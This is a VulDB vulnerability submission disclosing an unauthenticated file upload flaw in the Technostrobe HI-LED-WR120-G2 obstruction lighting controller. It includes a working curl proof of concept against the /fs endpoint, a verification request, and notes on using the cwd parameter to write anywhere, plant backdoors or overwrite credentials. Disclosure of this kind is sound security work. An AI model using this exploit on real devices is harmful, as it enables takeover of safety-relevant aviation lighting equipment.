提出 #783326: Technostrobe HI-LED-WR120-G2 Obstruction Lighting Controller 5.5.0.1R6.03.30 Unrestricted File Upload情報

タイトル	Technostrobe HI-LED-WR120-G2 Obstruction Lighting Controller 5.5.0.1R6.03.30 Unrestricted File Upload
説明	The device exposes an unauthenticated file upload endpoint: POST /fs HTTP/1.1 Host: <target> The Proof of Concept curl --http0.9 'http://technostrobe.shiky.demo:58746/fs' \ -X POST \ -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0)' \ -H 'Origin: http://technostrobe.shiky.demo:58746' \ -H 'Referer: http://technostrobe.shiky.demo:58746/Config/index_config.html' \ -F "cwd=/http/Technostrobe" \ -F "[email protected];type=text/x-python" \ -F "iehack=" \ -F "submit=Upload" Verify the upload worked: GET http://technostrobe.shiky.demo:58746/Technostrobe/test.txt → returns file contents ✅ No credentials. No session. One cURL command. File is on the device and web-accessible. Request Parameters — All Attacker-Controlled POST /fs Content-Type: multipart/form-data ┌─────────────────┬────────────────────────────────────────────────┐ │ Parameter │ Value / Notes │ ├─────────────────┼────────────────────────────────────────────────┤ │ cwd │ /http/Technostrobe ← ATTACKER CONTROLLED │ │ │ (destination directory — no restriction) │ ├─────────────────┼────────────────────────────────────────────────┤ │ selectedfile │ @payload.sh ← ANY FILE TYPE │ │ │ (no extension or MIME validation) │ ├─────────────────┼────────────────────────────────────────────────┤ │ iehack │ (empty) — legacy IE compatibility field │ ├─────────────────┼────────────────────────────────────────────────┤ │ submit │ Upload — action trigger │ └─────────────────┴────────────────────────────────────────────────┘ The cwd parameter is the most dangerous. Changing it targets any other directory on the filesystem: The file is stored on the device without validation. Root Cause: Missing authentication checks No file validation No path restrictions Impact: Arbitrary file upload Possible remote code execution Persistent backdoor deployment Config files (.cfg) ->Overwrite credentials, settings -> Backdoor admin access
ソース	⚠️ https://github.com/shiky8/my--cve-vulnerability-research/blob/main/my_VulnDB_cves/CVE-TECHNOSTROBE-05-FileUpload.md
ユーザー	shiky8 (UID 96565)
送信	2026年03月20日 01:28 (21 日 ago)
モデレーション	2026年04月04日 16:41 (16 days later)
ステータス	承諾済み
VulDBエントリ	355343 [Technostrobe HI-LED-WR120-G2 5.5.0.1R6.03.30 /fs cwd 特権昇格]
ポイント	20

◂ 前概要次 ▸

Are you interested in using VulDB?

Download the whitepaper to learn more about our service!